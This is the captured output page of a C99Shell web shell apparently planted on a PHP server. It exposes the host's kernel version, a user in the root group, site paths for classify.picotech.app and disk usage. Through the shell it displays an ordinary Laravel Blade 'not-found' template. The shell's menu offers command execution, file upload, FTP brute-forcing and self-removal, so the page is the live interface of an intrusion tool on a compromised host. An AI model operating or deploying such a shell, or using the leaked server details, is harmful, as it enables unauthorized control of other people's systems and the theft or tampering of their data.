!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/resources/views/components/   drwxr-xr-x
Free 29.42 GB of 117.98 GB (24.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     not-found.blade.php (2.95 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@php
    $singuler = Str::plural($word, 1);
    $plural = Str::plural($word, 2);
@endphp

@if ($method == 'GET')
    <div class="empty py-5">
        <div class="empty-img">
            <img src="{{ asset('backend/image') }}/not-found.svg" height="128px" width="208px" alt="">
        </div>
        <h5 class="mt-4">{{ __('no_results_found') }}</h5>
        <p class="empty-subtitle text-muted">
            {{ __('there_is_no') }} {{ strtolower($plural) }} {{ __('found_in_the_page') }}
        </p>
        @if ($route)
            <div class="empty-action">
                <a href="{{ route($route) }}" class="d-flex justify-content-center align-items-center text-center">
                    <button type="button"
                        class="btn btn-primary d-flex justify-content-center align-items-center text-center">
                        <svg xmlns="http://www.w3.org/2000/svg" class="icon" width="24" height="24"
                            viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none"
                            stroke-linecap="round" stroke-linejoin="round">
                            <path stroke="none" d="M0 0h24v24H0z" fill="none"></path>
                            <line x1="12" y1="5" x2="12" y2="19"></line>
                            <line x1="5" y1="12" x2="19" y2="12"></line>
                        </svg>
                        <span class="ms-2">{{ __('add_your_first') }} {{ strtolower($singuler) }}</span>
                    </button>
                </a>
            </div>
        @endif
    </div>
@else
    <div class="empty py-5">
        <div class="empty-img">
            <img src="{{ asset('backend/image') }}/not-found.svg" height="128px" width="208px" alt="">
        </div>
        <h5 class="mt-4">{{ __('no_results_found') }}</h5>
        <p class="empty-subtitle text-muted">
            {{ __('there_is_no') }} {{ strtolower($plural) }} {{ __('found_in_the_page') }}
        </p>
        @if ($route)
            <div class="empty-action d-flex">
                @if ($route !== '')
                    <form action="{{ route($route) }}" method="POST">
                        @csrf
                        <button class="btn btn-primary" type="submit">
                            <svg xmlns="http://www.w3.org/2000/svg" class="icon" width="24" height="24"
                                viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none"
                                stroke-linecap="round" stroke-linejoin="round">
                                <path stroke="none" d="M0 0h24v24H0z" fill="none"></path>
                                <line x1="12" y1="5" x2="12" y2="19"></line>
                                <line x1="5" y1="12" x2="19" y2="12"></line>
                            </svg>
                            {{ __('add_your_first') }} {{ strtolower($singuler) }}
                        </button>
                    </form>
                @endif
            </div>
        @endif
    </div>
@endif

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0039 ]--